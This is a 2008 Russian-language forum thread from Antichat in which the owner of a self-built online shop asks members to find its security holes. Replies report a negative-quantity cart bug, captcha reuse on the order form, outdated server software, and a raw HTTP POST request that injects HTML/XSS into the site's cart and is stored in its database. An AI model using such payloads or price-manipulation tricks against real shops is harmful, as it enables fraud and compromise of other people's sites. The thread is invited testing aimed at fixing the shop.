Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
05.01.2008, 18:57
|
|
Новичок
Регистрация: 02.02.2006
Сообщений: 28
Провел на форуме:
351198
Репутация:
54
|
|
Инет-магазин
сайт самописный, форумы не смотреть.
проверял Spider`ом вроде особо не находил такого критичного.
но для полной уверенности прошу Вашей помощи.
адрес сайта: http://green-leaf.ru/1/index1.php
|
|
|
29.03.2008, 04:45
|
|
Reservists Of Antichat - Level 6
Регистрация: 25.03.2008
Сообщений: 670
Провел на форуме:
4137635
Репутация:
2407
|
|
Пока нашёл, то что можно добавить в корзину отрицательное число товаров.
|
|
|
|
29.03.2008, 11:50
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
XSS
хз как я это сделал, я так нелюблю в аяксе копаться поэтому запросы редактировал
Код:
POST http://green-leaf.ru/1/data/188.php HTTP/1.0
Method: POST http://green-leaf.ru/1/data/188.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/9.26 (Windows NT 5.1; U; ru)
Host: green-leaf.ru
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Referer: http://green-leaf.ru/1/data/188.php
Cookie: prices_korzina=d80804d682988ec69ef6773be58b3044; Apache=86.106.217.37.377191206776053497
Cookie2: $Version=1
Proxy-Connection: close
Content-Length: 310
Content-Transfer-Encoding: binary
xajax=setDobInKorzina&xajaxr=120677663512'&xajaxargs[]=13366'&xajaxargs[]=<h1>Hello%20:)</h1>%20LG%20DGK774%20%D1%87%D0%B5%D1%80%D0%BD%D1%8B%D0%B9%20DVD%2BRW%2C%20DVD-R%2C%20-RW%2C%20MP3%2C%20JPEG%2C%20%D0%BA%D0%B0%D1%80%D0%B0%D0%BE%D0%BA%D0%B5&xajaxargs[]=<h1>O_o&xajaxargs[]=''%20%D0%BC%D0%B5%D1%81%20%D1%81%2F%D1%86
В базу так и добовляется с XSSными названиями, ппц, мне пришлют если я закажу домашний кинотеатр за 1$ 
=========================
http://green-leaf.ru/1/zakaz.php
Rfgnxf не обновляется, зажал enter он заказов 50 наверно отправил с 1 каптчи все приняты
Дальше давайте сами а я гамать иду 
Кстати почему все товары хранятся на http://www.ultracomp.ru/ 
Последний раз редактировалось Ponchik; 29.03.2008 в 12:05..
|
|
|
|
07.04.2008, 19:01
|
|
Новичок
Регистрация: 02.02.2006
Сообщений: 28
Провел на форуме:
351198
Репутация:
54
|
|
спасибо d_x и Ponchik
|
|
|
|
08.04.2008, 09:14
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Чувак, тыж не исправил ничерта
И когда мне её доставят?
Ты передавай значения не через POST а через SESSION |
|
|
|
14.06.2008, 22:53
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596
Репутация:
88
|
|
Ну тут в основном хостинг дырявый:
PHP HTML Entity Encoder Heap Overflow Vulnerability
Unfiltered Header Injection in Apache 1.3.34/2.0.57/2.2.1
Короче надо обновить им PHP и Апач профиксить
----------------------------------------
А на сайте:
XSS
korzina.php
Переменная prices_korzina |
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
